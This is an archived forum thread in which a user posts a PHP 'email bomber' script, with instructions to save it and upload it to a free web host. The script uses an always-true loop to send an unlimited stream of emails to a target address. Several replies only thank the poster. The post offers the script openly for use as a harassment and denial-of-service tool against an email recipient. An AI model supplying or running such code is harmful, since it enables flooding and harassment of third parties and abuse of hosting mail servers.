PDA

View Full Version : Email Bomber



Server_CM
10-28-2014, 04:46 PM
A very basic, yet effective E-Mail bomber that sends an unlimited amount of emails to the target.

How to:

Copy-Paste this code into notepad, save it as a .php file, and then upload to your free webhoster.

Note: This will work fine if your webhost has a mail server on it. If not, then this code is useless.


<?php
$i =1;
do {
mail("[email protected]", "Your Subject", "Your Message", "From: [email protected]");
} while ($i > 0);
?>

rubyrio
12-04-2014, 06:36 AM
thanks bro...................

zzz1178
02-14-2018, 05:47 PM
thank you!!!!!!!!!!!!!!

iseeyou
02-17-2018, 12:53 AM
let's trying your work

MaddoxDarby
06-09-2018, 08:41 AM
thanks broooooooooooooooo..................

g152xx
06-16-2018, 08:40 PM
Thank you very much! Peace !!!!